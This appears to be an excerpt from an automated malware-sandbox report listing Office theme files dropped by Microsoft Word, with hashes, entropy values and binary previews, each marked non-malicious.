                                                                                                                                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):278
                                                                                                                                                                                                                                                                Entropy (8bit):3.5270134268591966
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                                                                                                                                SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                                                                                                                                SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                                                                                                                                SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):924687
                                                                                                                                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                                                Entropy (8bit):3.51145753448333
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                                                                                                                                SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                                                                                                                                SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                                                                                                                                SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1204049
                                                                                                                                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276
                                                                                                                                                                                                                                                                Entropy (8bit):3.5364757859412563
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                                                                                                                                SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                                                                                                                                                SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                                                                                                                                SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1463634
                                                                                                                                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):3.5286004619027067
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                                                                                                                                SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                                                                                                                                                SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                                                                                                                                SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1091485
                                                                                                                                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):3.5301133500353727
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                                                                                                                                SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                                                                                                                                SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                                                                                                                                SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1750795
                                                                                                                                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):3.528155916440219
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                                                                                                                                SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                                                                                                                                SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                                                                                                                                SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2357051
                                                                                                                                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276
                                                                                                                                                                                                                                                                Entropy (8bit):3.516423078177173
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                                                                                                                                SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                                                                                                                                SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                                                                                                                                SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2218943
                                                                                                                                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
